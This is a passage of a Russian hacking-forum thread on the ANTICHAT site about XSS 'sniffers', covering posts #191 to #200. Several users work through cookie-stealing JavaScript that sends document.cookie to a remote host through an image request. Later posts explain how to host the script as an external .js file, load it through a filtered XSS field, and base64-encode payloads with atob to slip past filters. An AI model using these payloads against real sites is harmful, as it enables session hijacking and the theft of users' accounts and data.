HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу XSS [Mega Big Bug]
   
Ответ
Страница 20 из 22 « Первая < 10 16 17 18 19 20 21 22 >
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 30.03.2013, 01:00
Nigerman666
Познающий
Регистрация: 02.07.2012
Сообщений: 52
С нами: 7296086

Репутация: 0
По умолчанию
Где еще можно онлайн сниф заюзать?
А то на хосте мой сниф долго не живет((
 
Ответить с цитированием

  #192  
Старый 31.03.2013, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию
Бесплатные хостинги не валят.
 
Ответить с цитированием

  #193  
Старый 22.07.2013, 01:00
imbadjkelvin
Новичок
Регистрация: 22.07.2013
Сообщений: 1
С нами: 6741686

Репутация: 0
По умолчанию
Помогите , Хелп

У меня проблема со сниффером , я вроде бы уязвимость нашел , хостинг нашел , а вот как это все со сниффером "склеить" вообще невкурил , помогите нубу разобраться плс.
 
Ответить с цитированием

  #194  
Старый 04.01.2014, 01:00
usernel366
Новичок
Регистрация: 03.01.2014
Сообщений: 2
С нами: 6504086

Репутация: 0
По умолчанию
мазахакер помоги со своим js.в общем самодостаточные скрипты снифают нормально,но работают в хроме.тут есть один минус.хром убирает надпись javascript в адресной строке(ну и конешно большой минус мало какой юзверь решится такое вставить себе в браузер и тем более что то то дописывать руками)в firefox самодостаточные вообще не выполняются(тупо никакой реакции).при выполнении скрипта происходит редирект на гугл но в логах ничего нет.тоже самое с картинкой
img = new Image(); img.src = "http://сайт/картинка.gif?"+document.cookie; хотя при выполнении самодостаточного все снифается.как переделать js так чтобы все работало и можно ли сделать скрипт который одинаково нормально будет работать и в ff и в chrome
 
Ответить с цитированием

  #195  
Старый 04.01.2014, 01:00
usernel366
Новичок
Регистрация: 03.01.2014
Сообщений: 2
С нами: 6504086

Репутация: 0
По умолчанию
Цитата:

Сообщение от imbadjkelvin

Помогите , Хелп

У меня проблема со сниффером , я вроде бы уязвимость нашел , хостинг нашел , а вот как это все со сниффером "склеить" вообще невкурил , помогите нубу разобраться плс.

что склеить то?залей его на хост.зайди в лог и тестируй на сайтах где есть xss.хотя у меня получилось только с самодостаточными скриптами.и то тока в хроме
 
Ответить с цитированием

  #196  
Старый 18.01.2015, 01:00
rauf1324
Познающий
Регистрация: 17.09.2014
Сообщений: 48
С нами: 6134006

Репутация: 0
По умолчанию
либо голова не варит либо туплю , есть активка вставляю скрипт, не выполняеться, а в исходнике вижу что мешают символы

">img = new Image(); img.src = \"http://site.ru4_1.gif?\"+document.cookie; как их закодировать? пробовал base не катит
 
Ответить с цитированием

  #197  
Старый 18.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию
попробуй испоLьзовать одинарные кавычки '
 
Ответить с цитированием

  #198  
Старый 18.01.2015, 01:00
rauf1324
Познающий
Регистрация: 17.09.2014
Сообщений: 48
С нами: 6134006

Репутация: 0
По умолчанию
все равно такое пробывал
 
Ответить с цитированием

  #199  
Старый 18.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию
Цитата:

Сообщение от rauf1324

все равно такое пробывал

это не активка, а пасивка
там кавычки фильтруются, тебе нужно не сразу куки дергать а подгружать js
заливаешь на хостинг файл 1.js с содержанием

code:

img = new Image(); img.src = "http://site.ru4_1.gif?"+document.cookie;

и в поле где хсс вставляешь скрипт с адресом на загруженный js

code:

">
 
Ответить с цитированием

  #200  
Старый 20.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию
для проверки кодируешь
source:

Код:
alert(1)

в бейс64
получится вот это -
source:

Код:
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg
==

вставляешь вместо своего javascript:alert() вот это -
source:

Код:
javascript:document.
write
(
atob
(
'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='
))

если алерт сработал , то уже кодируешь свой скрипт в бейс64 типа
source:

Код:




вставляешь между кавычками после atob!

а вообще это один из множества вариантов!


		
		
		
		
		
		
			





	
	







 
	
	
		

			
			
			
				Ответить с цитированием
			
			
		
      
			










	

	
		
	




















	
		Ответ
		
	





	Страница 20 из 22



	« Первая
	<
	10	

	16

	

	17

	

	18

	

	19

	20
 	

	21

	

	22


	>
	




























	«
			Предыдущая тема
		|
		Следующая тема
	»












	

	

		
			Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
		
	

	

		
			 
		
	

	





















































		

		
		

			
			

	

	
	
	Быстрый переход

	
	



					
		
		
		























	
 

        

	
	

	
	

	
	

	
	
	
	
	
	

 


		

		

		

		         
		

		

                        
                            

                                
                                
                                   
                                 
                                 
                                 
				
                                     
                                      
                                             ANTICHAT ™ © 2001- Antichat Kft.